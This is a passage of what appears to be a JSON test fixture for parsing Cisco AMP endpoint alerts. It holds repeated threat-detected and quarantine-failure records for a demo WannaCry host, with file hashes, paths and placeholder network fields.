pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419229335730782000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419229331435814970", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + 
"family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500234601Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229335730782000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": 
"8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229335730782278", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500236656Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229335730782000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229335730782277", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + 
"user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500238724Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + 
"id": "6419229335730782000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229335730782276", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500240848Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229335730782000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229335730782275", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + 
"user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500242912Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + 
"id": "6419229335730782000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229335730782274", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500244968Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229335730782000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229335730782273", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + 
"user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500247029Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + 
"id": "6419229335730782000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229335730782272", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500249078Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419229335730782000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419229335730782271", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + 
"user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500251139Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + 
